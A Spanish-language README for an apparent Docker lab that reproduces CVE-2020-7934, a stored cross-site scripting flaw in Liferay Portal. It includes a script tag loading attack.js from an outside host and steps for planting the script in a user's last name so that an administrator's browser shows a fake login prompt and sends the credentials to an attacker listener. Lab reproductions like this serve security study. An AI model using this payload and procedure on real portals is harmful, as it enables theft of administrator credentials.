CVE 2020-7934
Cómo ejecutar el CVE
Requisitos
- docker
Notas
es posible poner el script de ataque en línea (con el código js) http://yourjavascript.com/
Nuestro script JS en línea para el ataque
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
Comandos de configuración
- ve a la carpeta raíz de este proyecto
- ejecuta "sudo docker-compose up --build"
- nueva terminal: ejecuta "docker inspect liferay" ==> y copia el valor de IPAddress
- nueva terminal: ejecuta "python api_attacker.py"
- abre un navegador y ve a "http://IPAddress:8080" ==> deberías obtener el portal de liferay como respuesta
- para detener y eliminar los contenedores usa "sudo docker-compose rm"
Instrucciones para el ataque
- Regístrate en liferay como usuario, inicia sesión y, en la sección "sitios disponibles", únete al sitio "liferay".
- Cambia el "apellido" en un script JS (directamente () o mediante un "src=" http ... "")
- Inicia sesión como administrador de liferay (usuario: [email protected], contraseña: test)
- Ve a sitios disponibles y haz clic en "liferay"; se abrirá la página pública de este sitio.
- Ve a la nueva página, se abrirá un menú a la derecha, haz clic en membresía.
- Selecciona el usuario registrado en el paso 1. En ese momento se ejecutará el script.
5.1) En el script attack.js la página pedirá las credenciales.
- En la terminal del paso 5 (de Comandos de configuración) se imprimirán el usuario/contraseña introducidos en el 5.1 (por el administrador).